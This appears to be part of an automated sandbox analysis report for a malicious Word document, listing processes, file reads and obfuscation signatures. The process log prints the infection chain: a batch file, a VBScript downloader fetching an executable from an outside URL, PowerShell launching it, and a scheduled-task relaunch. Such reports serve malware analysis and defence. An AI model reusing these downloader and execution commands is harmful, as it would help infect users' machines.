Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: SizeofResource | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: LockResource | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: SkinTest | 7_2_00401069
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries a list of all open handles
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | System information queried: HandleInformation
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\cscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\System32\cscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\DiskDrive\1\Volume\BackFiles\errorfix.bat
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://ictd.ae/YAS17.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C Sleep -s 4;Saps 'C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe'
Source: unknown | Process created: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe 'C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe'
Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {2CBEE7D8-86F5-4B24-91AD-6F75657A40AB} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknown | Process created: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\DiskDrive\1\Volume\BackFiles\errorfix.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://ictd.ae/YAS17.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C Sleep -s 4;Saps 'C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe 'C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe'
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\cscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Writes ini files
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | File written: C:\Users\user\AppData\Roaming\List15\settings.ini
Executable creates window controls seldom found in malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: c:\Users\User\Desktop\2008\4.3.20\SkinStyle_src\SkinTest\Release\SkinTest.pdb source: cscript.exe, 00000003.00000003.1060252329.00342000.00000004.00000001.sdmp, ZXTRTU.exe, 00000005.00000002.1134644215.00409000.00000002.00020000.sdmp, ZXTRTU.exe, 00000007.00000002.1488966051.00409000.00000002.00020000.sdmp, ZXTRTU.exe.3.dr
Document has a 'subject' value indicative of goodware
Source: 98.doc | Initial sample: OLE summary subject = arsrrxlh
Document has a 'vbamacros' value indicative of goodware
Source: 98.doc | Initial sample: OLE indicators vbamacros = False
Document has an 'encrypted' value indicative of goodware
Source: 98.doc | Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A9CE0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 5_2_005A9CE0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_00405431 push ecx; ret | 5_2_00405444
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_00404B65 push ecx; ret | 5_2_00404B78
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B8AA0 push eax; mov dword ptr [esp], 00000103h | 5_2_005B8AA2
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_00405431 push ecx; ret | 7_2_00405444